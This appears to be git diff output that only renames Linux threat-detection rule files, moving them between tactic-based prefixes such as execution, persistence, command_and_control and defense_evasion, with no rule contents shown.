rules/linux/{execution_network_event_post_compilation.toml => command_and_control_network_event_post_compilation.toml} (100%) rename rules/linux/{persistence_pluggable_authentication_module_source_download.toml => command_and_control_pluggable_authentication_module_source_download.toml} (100%) rename rules/linux/{execution_shell_openssl_client_or_server.toml => command_and_control_shell_openssl_client_or_server.toml} (100%) rename rules/linux/{execution_shell_via_background_process.toml => command_and_control_shell_via_background_process.toml} (100%) rename rules/linux/{execution_shell_via_child_tcp_utility_linux.toml => command_and_control_shell_via_child_tcp_utility_linux.toml} (100%) rename rules/linux/{execution_shell_via_lolbin_interpreter_linux.toml => command_and_control_shell_via_lolbin_interpreter_linux.toml} (100%) rename rules/linux/{execution_shell_via_suspicious_binary.toml => command_and_control_shell_via_suspicious_binary.toml} (100%) rename rules/linux/{execution_shell_via_tcp_cli_utility_linux.toml => command_and_control_shell_via_tcp_cli_utility_linux.toml} (100%) rename rules/linux/{execution_shell_via_udp_cli_utility_linux.toml => command_and_control_shell_via_udp_cli_utility_linux.toml} (100%) rename rules/linux/{persistence_simple_web_server_connection_accepted.toml => command_and_control_simple_web_server_connection_accepted.toml} (100%) rename rules/linux/{lateral_movement_ssh_it_worm_download.toml => command_and_control_ssh_it_worm_download.toml} (100%) rename rules/linux/{persistence_systemd_netcon.toml => command_and_control_systemd_netcon.toml} (100%) rename rules/linux/{lateral_movement_telnet_network_activity_external.toml => command_and_control_telnet_network_activity_external.toml} (100%) rename rules/linux/{persistence_web_server_sus_destination_port.toml => command_and_control_web_server_sus_destination_port.toml} (100%) rename rules/linux/{privilege_escalation_dac_permissions.toml => credential_access_dac_permissions.toml} (100%) 
rename rules/linux/{lateral_movement_kubeconfig_file_activity.toml => credential_access_kubeconfig_file_activity.toml} (100%) rename rules/linux/{discovery_kubeconfig_file_discovery.toml => credential_access_kubeconfig_file_discovery.toml} (100%) rename rules/linux/{execution_kubernetes_direct_api_request_via_curl_or_wget.toml => credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml} (100%) rename rules/linux/{persistence_credential_access_modify_ssh_binaries.toml => credential_access_modify_ssh_binaries.toml} (100%) rename rules/linux/{persistence_pluggable_authentication_module_creation.toml => credential_access_pluggable_authentication_module_creation.toml} (100%) rename rules/linux/{persistence_pluggable_authentication_module_creation_in_unusual_dir.toml => credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml} (100%) rename rules/linux/{impact_potential_bruteforce_malware_infection.toml => credential_access_potential_bruteforce_malware_infection.toml} (100%) rename rules/linux/{execution_potential_hack_tool_executed.toml => credential_access_potential_hack_tool_executed.toml} (100%) rename rules/linux/{discovery_private_key_password_searching_activity.toml => credential_access_private_key_password_searching_activity.toml} (100%) rename rules/linux/{discovery_security_file_access_via_common_utility.toml => credential_access_security_file_access_via_common_utility.toml} (100%) rename rules/linux/{privilege_escalation_shadow_file_read.toml => credential_access_shadow_file_read.toml} (100%) rename rules/linux/{discovery_suspicious_network_tool_launched_inside_container.toml => credential_access_suspicious_network_tool_launched_inside_container.toml} (100%) rename rules/linux/{execution_abnormal_process_id_file_created.toml => defense_evasion_abnormal_process_id_file_created.toml} (100%) rename rules/linux/{persistence_boot_file_copy.toml => defense_evasion_boot_file_copy.toml} (100%) rename 
rules/linux/{persistence_bpf_probe_write_user.toml => defense_evasion_bpf_probe_write_user.toml} (100%) rename rules/linux/{persistence_bpf_program_or_map_load.toml => defense_evasion_bpf_program_or_map_load.toml} (100%) rename rules/linux/{privilege_escalation_chown_chmod_unauthorized_file_read.toml => defense_evasion_chown_chmod_unauthorized_file_read.toml} (100%) rename rules/linux/{execution_file_made_executable_via_chmod_inside_container.toml => defense_evasion_file_made_executable_via_chmod_inside_container.toml} (100%) rename rules/linux/{persistence_insmod_kernel_module_load.toml => defense_evasion_insmod_kernel_module_load.toml} (100%) rename rules/linux/{persistence_kernel_driver_load.toml => defense_evasion_kernel_driver_load.toml} (100%) rename rules/linux/{persistence_kernel_driver_load_by_non_root.toml => defense_evasion_kernel_driver_load_by_non_root.toml} (100%) rename rules/linux/{persistence_kernel_module_load_from_unusual_location.toml => defense_evasion_kernel_module_load_from_unusual_location.toml} (100%) rename rules/linux/{persistence_kworker_file_creation.toml => defense_evasion_kworker_file_creation.toml} (100%) rename rules/linux/{privilege_escalation_kworker_uid_elevation.toml => defense_evasion_kworker_uid_elevation.toml} (100%) rename rules/linux/{command_and_control_linux_kworker_netcon.toml => defense_evasion_linux_kworker_netcon.toml} (100%) rename rules/linux/{privilege_escalation_load_and_unload_of_kernel_via_kexec.toml => defense_evasion_load_and_unload_of_kernel_via_kexec.toml} (100%) rename rules/linux/{execution_netcon_from_rwx_mem_region_binary.toml => defense_evasion_netcon_from_rwx_mem_region_binary.toml} (100%) rename rules/linux/{execution_process_backgrounded_by_unusual_parent.toml => defense_evasion_process_backgrounded_by_unusual_parent.toml} (100%) rename rules/linux/{execution_process_started_from_process_id_file.toml => defense_evasion_process_started_from_process_id_file.toml} (100%) rename 
rules/linux/{execution_process_started_in_shared_memory_directory.toml => defense_evasion_process_started_in_shared_memory_directory.toml} (100%) rename rules/linux/{privilege_escalation_sda_disk_mount_non_root.toml => defense_evasion_sda_disk_mount_non_root.toml} (100%) rename rules/linux/{persistence_shared_object_creation.toml => defense_evasion_shared_object_creation.toml} (100%) rename rules/linux/{execution_shell_evasion_linux_binary.toml => defense_evasion_shell_evasion_linux_binary.toml} (100%) rename rules/linux/{execution_sus_extraction_or_decrompression_via_funzip.toml => defense_evasion_sus_extraction_or_decrompression_via_funzip.toml} (100%) rename rules/linux/{privilege_escalation_suspicious_chown_fowner_elevation.toml => defense_evasion_suspicious_chown_fowner_elevation.toml} (100%) rename rules/linux/{execution_system_binary_file_permission_change.toml => defense_evasion_system_binary_file_permission_change.toml} (100%) rename rules/linux/{execution_tc_bpf_filter.toml => defense_evasion_tc_bpf_filter.toml} (100%) rename rules/linux/{execution_unusual_kthreadd_execution.toml => defense_evasion_unusual_kthreadd_execution.toml} (100%) rename rules/linux/{persistence_unusual_pam_grantor.toml => defense_evasion_unusual_pam_grantor.toml} (100%) rename rules/linux/{execution_unusual_path_invocation_from_command_line.toml => defense_evasion_unusual_path_invocation_from_command_line.toml} (100%) rename rules/linux/{discovery_virtual_machine_fingerprinting.toml => defense_evasion_virtual_machine_fingerprinting.toml} (100%) rename rules/linux/{execution_shell_via_meterpreter_linux.toml => discovery_shell_via_meterpreter_linux.toml} (100%) rename rules/linux/{execution_suspicious_executable_running_system_commands.toml => discovery_suspicious_executable_running_system_commands.toml} (100%) rename rules/linux/{persistence_apt_package_manager_execution.toml => execution_apt_package_manager_execution.toml} (100%) rename 
rules/linux/{persistence_apt_package_manager_netcon.toml => execution_apt_package_manager_netcon.toml} (100%) rename rules/linux/{persistence_at_job_creation.toml => execution_at_job_creation.toml} (100%) rename rules/linux/{persistence_cron_job_creation.toml => execution_cron_job_creation.toml} (100%) rename rules/linux/{command_and_control_cupsd_foomatic_rip_netcon.toml => execution_cupsd_foomatic_rip_netcon.toml} (100%) rename rules/linux/{persistence_dbus_unsual_daemon_parent_execution.toml => execution_dbus_unsual_daemon_parent_execution.toml} (100%) rename rules/linux/{persistence_git_hook_execution.toml => execution_git_hook_execution.toml} (100%) rename rules/linux/{persistence_git_hook_process_execution.toml => execution_git_hook_process_execution.toml} (100%) rename rules/linux/{defense_evasion_interactive_shell_from_system_user.toml => execution_interactive_shell_from_system_user.toml} (100%) rename rules/linux/{privilege_escalation_potential_wildcard_shell_spawn.toml => execution_potential_wildcard_shell_spawn.toml} (100%) rename rules/linux/{persistence_suspicious_ssh_execution_xzbackdoor.toml => execution_suspicious_ssh_execution_xzbackdoor.toml} (100%) rename rules/linux/{persistence_systemd_service_started.toml => execution_systemd_service_started.toml} (100%) rename rules/linux/{persistence_systemd_shell_execution.toml => execution_systemd_shell_execution.toml} (100%) rename rules/linux/{persistence_unusual_exim4_child_process.toml => execution_unusual_exim4_child_process.toml} (100%) rename rules/linux/{persistence_web_server_sus_child_spawned.toml => execution_web_server_sus_child_spawned.toml} (100%) rename rules/linux/{persistence_web_server_sus_command_execution.toml => execution_web_server_sus_command_execution.toml} (100%) rename rules/linux/{persistence_web_server_unusual_command_execution.toml => execution_web_server_unusual_command_execution.toml} (100%) rename rules/linux/{defense_evasion_authorized_keys_file_deletion.toml => 
impact_authorized_keys_file_deletion.toml} (100%) rename rules/linux/{defense_evasion_rename_esxi_files.toml => impact_rename_esxi_files.toml} (100%) rename rules/linux/{execution_suspicious_mining_process_creation_events.toml => impact_suspicious_mining_process_creation_events.toml} (100%) rename rules/linux/{defense_evasion_user_or_group_deletion.toml => impact_user_or_group_deletion.toml} (100%) rename rules/linux/{persistence_linux_shell_activity_via_web_server.toml => initial_access_linux_shell_activity_via_web_server.toml} (100%) rename rules/linux/{privilege_escalation_potential_bufferoverflow_attack.toml => initial_access_potential_bufferoverflow_attack.toml} (100%) rename rules/linux/{persistence_ssh_via_backdoored_system_user.toml => initial_access_ssh_via_backdoored_system_user.toml} (100%) rename rules/linux/{persistence_unusual_sshd_child_process.toml => lateral_movement_unusual_sshd_child_process.toml} (100%) rename rules/linux/{privilege_escalation_ld_preload_shared_object_modif.toml => persistence_ld_preload_shared_object_modif.toml} (100%) rename rules/linux/{defense_evasion_ld_so_creation.toml => persistence_ld_so_creation.toml} (100%) rename rules/linux/{privilege_escalation_linux_suspicious_symbolic_link.toml => persistence_linux_suspicious_symbolic_link.toml} (100%) rename rules/linux/{privilege_escalation_sudo_hijacking.toml => persistence_sudo_hijacking.toml} (100%) rename rules/linux/{privilege_escalation_suspicious_passwd_file_write.toml => persistence_suspicious_passwd_file_write.toml} (100%) rename rules/linux/{persistence_process_capability_set_via_setcap.toml => privilege_escalation_process_capability_set_via_setcap.toml} (100%) rename rules/linux/{persistence_setuid_setgid_capability_set.toml => privilege_escalation_setuid_setgid_capability_set.toml} (100%) rename rules/linux/{execution_unusual_pkexec_execution.toml => privilege_escalation_unusual_pkexec_execution.toml} (100%) 
diff --git a/rules/linux/credential_access_gdb_process_hooking.toml b/rules/linux/collection_gdb_process_hooking.toml
similarity index 100%
rename from rules/linux/credential_access_gdb_process_hooking.toml
rename to rules/linux/collection_gdb_process_hooking.toml
diff --git a/rules/linux/exfiltration_potential_database_dumping.toml b/rules/linux/collection_potential_database_dumping.toml
similarity index 100%
rename from rules/linux/exfiltration_potential_database_dumping.toml
rename to rules/linux/collection_potential_database_dumping.toml
diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/collection_sensitive_files.toml
similarity index 100%
rename from rules/linux/credential_access_collection_sensitive_files.toml
rename to rules/linux/collection_sensitive_files.toml
diff --git a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml b/rules/linux/collection_sensitive_files_compression_inside_container.toml
similarity index 100%
rename from rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
rename to rules/linux/collection_sensitive_files_compression_inside_container.toml
diff --git a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml
similarity index 100%
rename from rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml
rename to rules/linux/command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml
diff --git a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml b/rules/linux/command_and_control_curl_or_wget_executed_via_lolbin.toml
similarity index 100%
rename from rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
rename to rules/linux/command_and_control_curl_or_wget_executed_via_lolbin.toml
diff --git a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml b/rules/linux/command_and_control_egress_connection_from_entrypoint_in_container.toml
similarity index 100%
rename from rules/linux/execution_egress_connection_from_entrypoint_in_container.toml
rename to rules/linux/command_and_control_egress_connection_from_entrypoint_in_container.toml
diff --git a/rules/linux/execution_file_execution_followed_by_deletion.toml b/rules/linux/command_and_control_file_execution_followed_by_deletion.toml
similarity index 100%
rename from rules/linux/execution_file_execution_followed_by_deletion.toml
rename to rules/linux/command_and_control_file_execution_followed_by_deletion.toml
diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/command_and_control_file_transfer_or_listener_established_via_netcat.toml
similarity index 100%
rename from rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml
rename to rules/linux/command_and_control_file_transfer_or_listener_established_via_netcat.toml
diff --git a/rules/linux/persistence_git_hook_netcon.toml b/rules/linux/command_and_control_git_hook_netcon.toml
similarity index 100%
rename from rules/linux/persistence_git_hook_netcon.toml
rename to rules/linux/command_and_control_git_hook_netcon.toml
diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/command_and_control_nc_listener_via_rlwrap.toml
similarity index 100%
rename from rules/linux/execution_nc_listener_via_rlwrap.toml
rename to rules/linux/command_and_control_nc_listener_via_rlwrap.toml
diff --git a/rules/linux/execution_network_event_post_compilation.toml b/rules/linux/command_and_control_network_event_post_compilation.toml
similarity index 100%
rename from rules/linux/execution_network_event_post_compilation.toml
rename to rules/linux/command_and_control_network_event_post_compilation.toml
diff --git a/rules/linux/persistence_pluggable_authentication_module_source_download.toml b/rules/linux/command_and_control_pluggable_authentication_module_source_download.toml
similarity index 100%
rename from rules/linux/persistence_pluggable_authentication_module_source_download.toml
rename to rules/linux/command_and_control_pluggable_authentication_module_source_download.toml
diff --git a/rules/linux/execution_shell_openssl_client_or_server.toml b/rules/linux/command_and_control_shell_openssl_client_or_server.toml
similarity index 100%
rename from rules/linux/execution_shell_openssl_client_or_server.toml
rename to rules/linux/command_and_control_shell_openssl_client_or_server.toml
diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/command_and_control_shell_via_background_process.toml
similarity index 100%
rename from rules/linux/execution_shell_via_background_process.toml
rename to rules/linux/command_and_control_shell_via_background_process.toml
diff --git a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml b/rules/linux/command_and_control_shell_via_child_tcp_utility_linux.toml
similarity index 100%
rename from rules/linux/execution_shell_via_child_tcp_utility_linux.toml
rename to rules/linux/command_and_control_shell_via_child_tcp_utility_linux.toml
diff --git a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml b/rules/linux/command_and_control_shell_via_lolbin_interpreter_linux.toml
similarity index 100%
rename from rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
rename to rules/linux/command_and_control_shell_via_lolbin_interpreter_linux.toml
diff --git a/rules/linux/execution_shell_via_suspicious_binary.toml b/rules/linux/command_and_control_shell_via_suspicious_binary.toml
similarity index 100%
rename from rules/linux/execution_shell_via_suspicious_binary.toml
rename to rules/linux/command_and_control_shell_via_suspicious_binary.toml
diff --git a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml b/rules/linux/command_and_control_shell_via_tcp_cli_utility_linux.toml
similarity index 100%
rename from rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
rename to rules/linux/command_and_control_shell_via_tcp_cli_utility_linux.toml
diff --git a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml b/rules/linux/command_and_control_shell_via_udp_cli_utility_linux.toml
similarity index 100%
rename from rules/linux/execution_shell_via_udp_cli_utility_linux.toml
rename to rules/linux/command_and_control_shell_via_udp_cli_utility_linux.toml
diff --git a/rules/linux/persistence_simple_web_server_connection_accepted.toml b/rules/linux/command_and_control_simple_web_server_connection_accepted.toml
similarity index 100%
rename from rules/linux/persistence_simple_web_server_connection_accepted.toml
rename to rules/linux/command_and_control_simple_web_server_connection_accepted.toml
diff --git a/rules/linux/lateral_movement_ssh_it_worm_download.toml b/rules/linux/command_and_control_ssh_it_worm_download.toml
similarity index 100%
rename from rules/linux/lateral_movement_ssh_it_worm_download.toml
rename to rules/linux/command_and_control_ssh_it_worm_download.toml
diff --git a/rules/linux/persistence_systemd_netcon.toml b/rules/linux/command_and_control_systemd_netcon.toml
similarity index 100%
rename from rules/linux/persistence_systemd_netcon.toml
rename to rules/linux/command_and_control_systemd_netcon.toml
diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/command_and_control_telnet_network_activity_external.toml
similarity index 100%
rename from rules/linux/lateral_movement_telnet_network_activity_external.toml
rename to rules/linux/command_and_control_telnet_network_activity_external.toml
diff --git a/rules/linux/persistence_web_server_sus_destination_port.toml b/rules/linux/command_and_control_web_server_sus_destination_port.toml
similarity index 100%
rename from rules/linux/persistence_web_server_sus_destination_port.toml
rename to rules/linux/command_and_control_web_server_sus_destination_port.toml
diff --git a/rules/linux/privilege_escalation_dac_permissions.toml b/rules/linux/credential_access_dac_permissions.toml
similarity index 100%
rename from rules/linux/privilege_escalation_dac_permissions.toml
rename to rules/linux/credential_access_dac_permissions.toml
diff --git a/rules/linux/lateral_movement_kubeconfig_file_activity.toml b/rules/linux/credential_access_kubeconfig_file_activity.toml
similarity index 100%
rename from rules/linux/lateral_movement_kubeconfig_file_activity.toml
rename to rules/linux/credential_access_kubeconfig_file_activity.toml
diff --git a/rules/linux/discovery_kubeconfig_file_discovery.toml b/rules/linux/credential_access_kubeconfig_file_discovery.toml
similarity index 100%
rename from rules/linux/discovery_kubeconfig_file_discovery.toml
rename to rules/linux/credential_access_kubeconfig_file_discovery.toml
diff --git a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml
similarity index 100%
rename from rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml
rename to rules/linux/credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml
diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/credential_access_modify_ssh_binaries.toml
similarity index 100%
rename from rules/linux/persistence_credential_access_modify_ssh_binaries.toml
rename to rules/linux/credential_access_modify_ssh_binaries.toml
diff --git a/rules/linux/persistence_pluggable_authentication_module_creation.toml b/rules/linux/credential_access_pluggable_authentication_module_creation.toml
similarity index 100%
rename from rules/linux/persistence_pluggable_authentication_module_creation.toml
rename to rules/linux/credential_access_pluggable_authentication_module_creation.toml
diff --git a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml
similarity index 100%
rename from rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml
rename to rules/linux/credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml
diff --git a/rules/linux/impact_potential_bruteforce_malware_infection.toml b/rules/linux/credential_access_potential_bruteforce_malware_infection.toml
similarity index 100%
rename from rules/linux/impact_potential_bruteforce_malware_infection.toml
rename to rules/linux/credential_access_potential_bruteforce_malware_infection.toml
diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/credential_access_potential_hack_tool_executed.toml
similarity index 100%
rename from rules/linux/execution_potential_hack_tool_executed.toml
rename to rules/linux/credential_access_potential_hack_tool_executed.toml
diff --git a/rules/linux/discovery_private_key_password_searching_activity.toml b/rules/linux/credential_access_private_key_password_searching_activity.toml
similarity index 100%
rename from rules/linux/discovery_private_key_password_searching_activity.toml
rename to rules/linux/credential_access_private_key_password_searching_activity.toml
diff --git a/rules/linux/discovery_security_file_access_via_common_utility.toml b/rules/linux/credential_access_security_file_access_via_common_utility.toml
similarity index 100%
rename from rules/linux/discovery_security_file_access_via_common_utility.toml
rename to rules/linux/credential_access_security_file_access_via_common_utility.toml
diff --git a/rules/linux/privilege_escalation_shadow_file_read.toml b/rules/linux/credential_access_shadow_file_read.toml
similarity index 100%
rename from rules/linux/privilege_escalation_shadow_file_read.toml
rename to rules/linux/credential_access_shadow_file_read.toml
diff --git a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml b/rules/linux/credential_access_suspicious_network_tool_launched_inside_container.toml
similarity index 100%
rename from rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml
rename to rules/linux/credential_access_suspicious_network_tool_launched_inside_container.toml
diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/defense_evasion_abnormal_process_id_file_created.toml
similarity index 100%
rename from rules/linux/execution_abnormal_process_id_file_created.toml
rename to rules/linux/defense_evasion_abnormal_process_id_file_created.toml
diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/defense_evasion_boot_file_copy.toml
similarity index 100%
rename from rules/linux/persistence_boot_file_copy.toml
rename to rules/linux/defense_evasion_boot_file_copy.toml
diff --git a/rules/linux/persistence_bpf_probe_write_user.toml b/rules/linux/defense_evasion_bpf_probe_write_user.toml
similarity index 100%
rename from rules/linux/persistence_bpf_probe_write_user.toml
rename to rules/linux/defense_evasion_bpf_probe_write_user.toml
diff --git a/rules/linux/persistence_bpf_program_or_map_load.toml b/rules/linux/defense_evasion_bpf_program_or_map_load.toml
similarity index 100%
rename from rules/linux/persistence_bpf_program_or_map_load.toml
rename to rules/linux/defense_evasion_bpf_program_or_map_load.toml
diff --git a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml b/rules/linux/defense_evasion_chown_chmod_unauthorized_file_read.toml
similarity index 100%
rename from rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml
rename to rules/linux/defense_evasion_chown_chmod_unauthorized_file_read.toml
diff --git a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml b/rules/linux/defense_evasion_file_made_executable_via_chmod_inside_container.toml
similarity index 100%
rename from rules/linux/execution_file_made_executable_via_chmod_inside_container.toml
rename to rules/linux/defense_evasion_file_made_executable_via_chmod_inside_container.toml
diff --git a/rules/linux/persistence_insmod_kernel_module_load.toml b/rules/linux/defense_evasion_insmod_kernel_module_load.toml
similarity index 100%
rename from rules/linux/persistence_insmod_kernel_module_load.toml
rename to rules/linux/defense_evasion_insmod_kernel_module_load.toml
diff --git a/rules/linux/persistence_kernel_driver_load.toml b/rules/linux/defense_evasion_kernel_driver_load.toml
similarity index 100%
rename from rules/linux/persistence_kernel_driver_load.toml
rename to rules/linux/defense_evasion_kernel_driver_load.toml
diff --git a/rules/linux/persistence_kernel_driver_load_by_non_root.toml b/rules/linux/defense_evasion_kernel_driver_load_by_non_root.toml
similarity index 100%
rename from rules/linux/persistence_kernel_driver_load_by_non_root.toml
rename to rules/linux/defense_evasion_kernel_driver_load_by_non_root.toml
diff --git a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml b/rules/linux/defense_evasion_kernel_module_load_from_unusual_location.toml
similarity index 100%
rename from rules/linux/persistence_kernel_module_load_from_unusual_location.toml
rename to rules/linux/defense_evasion_kernel_module_load_from_unusual_location.toml
diff --git a/rules/linux/persistence_kworker_file_creation.toml b/rules/linux/defense_evasion_kworker_file_creation.toml
similarity index 100%
rename from rules/linux/persistence_kworker_file_creation.toml
rename to rules/linux/defense_evasion_kworker_file_creation.toml
diff --git a/rules/linux/privilege_escalation_kworker_uid_elevation.toml b/rules/linux/defense_evasion_kworker_uid_elevation.toml
similarity index 100%
rename from rules/linux/privilege_escalation_kworker_uid_elevation.toml
rename to rules/linux/defense_evasion_kworker_uid_elevation.toml
diff --git a/rules/linux/command_and_control_linux_kworker_netcon.toml b/rules/linux/defense_evasion_linux_kworker_netcon.toml
similarity index 100%
rename from rules/linux/command_and_control_linux_kworker_netcon.toml
rename to rules/linux/defense_evasion_linux_kworker_netcon.toml
diff --git a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/defense_evasion_load_and_unload_of_kernel_via_kexec.toml
similarity index 100%
rename from rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml
rename to rules/linux/defense_evasion_load_and_unload_of_kernel_via_kexec.toml
diff --git a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml b/rules/linux/defense_evasion_netcon_from_rwx_mem_region_binary.toml
similarity index 100%
rename from rules/linux/execution_netcon_from_rwx_mem_region_binary.toml
rename to rules/linux/defense_evasion_netcon_from_rwx_mem_region_binary.toml
diff --git a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml b/rules/linux/defense_evasion_process_backgrounded_by_unusual_parent.toml
similarity index 100%
rename from rules/linux/execution_process_backgrounded_by_unusual_parent.toml
rename to rules/linux/defense_evasion_process_backgrounded_by_unusual_parent.toml
diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/defense_evasion_process_started_from_process_id_file.toml
similarity index 100%
rename from rules/linux/execution_process_started_from_process_id_file.toml
rename to rules/linux/defense_evasion_process_started_from_process_id_file.toml
diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/defense_evasion_process_started_in_shared_memory_directory.toml
similarity index 100%
rename from rules/linux/execution_process_started_in_shared_memory_directory.toml
rename to rules/linux/defense_evasion_process_started_in_shared_memory_directory.toml
diff --git a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml b/rules/linux/defense_evasion_sda_disk_mount_non_root.toml
similarity index 100%
rename from rules/linux/privilege_escalation_sda_disk_mount_non_root.toml
rename to rules/linux/defense_evasion_sda_disk_mount_non_root.toml
diff --git a/rules/linux/persistence_shared_object_creation.toml b/rules/linux/defense_evasion_shared_object_creation.toml
similarity index 100%
rename from rules/linux/persistence_shared_object_creation.toml
rename to rules/linux/defense_evasion_shared_object_creation.toml
diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/defense_evasion_shell_evasion_linux_binary.toml
similarity index 100%
rename from rules/linux/execution_shell_evasion_linux_binary.toml
rename to rules/linux/defense_evasion_shell_evasion_linux_binary.toml
diff --git a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/defense_evasion_sus_extraction_or_decrompression_via_funzip.toml
similarity index 100%
rename from rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
rename to rules/linux/defense_evasion_sus_extraction_or_decrompression_via_funzip.toml
diff --git a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml b/rules/linux/defense_evasion_suspicious_chown_fowner_elevation.toml
similarity index 100%
rename from rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml
rename to rules/linux/defense_evasion_suspicious_chown_fowner_elevation.toml
diff --git a/rules/linux/execution_system_binary_file_permission_change.toml b/rules/linux/defense_evasion_system_binary_file_permission_change.toml
similarity index 100%
rename from rules/linux/execution_system_binary_file_permission_change.toml
rename to rules/linux/defense_evasion_system_binary_file_permission_change.toml
diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/defense_evasion_tc_bpf_filter.toml
similarity index 100%
rename from rules/linux/execution_tc_bpf_filter.toml
rename to rules/linux/defense_evasion_tc_bpf_filter.toml
diff --git a/rules/linux/execution_unusual_kthreadd_execution.toml b/rules/linux/defense_evasion_unusual_kthreadd_execution.toml
similarity index 100%
rename from rules/linux/execution_unusual_kthreadd_execution.toml
rename to rules/linux/defense_evasion_unusual_kthreadd_execution.toml
diff --git a/rules/linux/persistence_unusual_pam_grantor.toml b/rules/linux/defense_evasion_unusual_pam_grantor.toml
similarity index 100%
rename from rules/linux/persistence_unusual_pam_grantor.toml
rename to rules/linux/defense_evasion_unusual_pam_grantor.toml
diff --git a/rules/linux/execution_unusual_path_invocation_from_command_line.toml b/rules/linux/defense_evasion_unusual_path_invocation_from_command_line.toml
similarity index 100%
rename from rules/linux/execution_unusual_path_invocation_from_command_line.toml
rename to rules/linux/defense_evasion_unusual_path_invocation_from_command_line.toml
diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/defense_evasion_virtual_machine_fingerprinting.toml
similarity index 100%
rename from rules/linux/discovery_virtual_machine_fingerprinting.toml
rename to rules/linux/defense_evasion_virtual_machine_fingerprinting.toml
diff --git a/rules/linux/execution_shell_via_meterpreter_linux.toml b/rules/linux/discovery_shell_via_meterpreter_linux.toml
similarity index 100%
rename from rules/linux/execution_shell_via_meterpreter_linux.toml
rename to rules/linux/discovery_shell_via_meterpreter_linux.toml
diff --git a/rules/linux/execution_suspicious_executable_running_system_commands.toml b/rules/linux/discovery_suspicious_executable_running_system_commands.toml
similarity index 100%
rename from rules/linux/execution_suspicious_executable_running_system_commands.toml
rename to rules/linux/discovery_suspicious_executable_running_system_commands.toml
diff --git a/rules/linux/persistence_apt_package_manager_execution.toml b/rules/linux/execution_apt_package_manager_execution.toml
similarity index 100%
rename from rules/linux/persistence_apt_package_manager_execution.toml
rename to rules/linux/execution_apt_package_manager_execution.toml
diff --git a/rules/linux/persistence_apt_package_manager_netcon.toml b/rules/linux/execution_apt_package_manager_netcon.toml
similarity index 100%
rename from rules/linux/persistence_apt_package_manager_netcon.toml
rename to rules/linux/execution_apt_package_manager_netcon.toml
diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/execution_at_job_creation.toml
similarity index 100%
rename from rules/linux/persistence_at_job_creation.toml
rename to rules/linux/execution_at_job_creation.toml
diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/execution_cron_job_creation.toml
similarity index 100%
rename from rules/linux/persistence_cron_job_creation.toml
rename to rules/linux/execution_cron_job_creation.toml
diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml b/rules/linux/execution_cupsd_foomatic_rip_netcon.toml
similarity index 100%
rename from rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml
rename to rules/linux/execution_cupsd_foomatic_rip_netcon.toml
diff --git a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml b/rules/linux/execution_dbus_unsual_daemon_parent_execution.toml
similarity index 100%
rename from rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
rename to rules/linux/execution_dbus_unsual_daemon_parent_execution.toml
diff --git a/rules/linux/persistence_git_hook_execution.toml b/rules/linux/execution_git_hook_execution.toml
similarity index 100%
rename from rules/linux/persistence_git_hook_execution.toml
rename to rules/linux/execution_git_hook_execution.toml
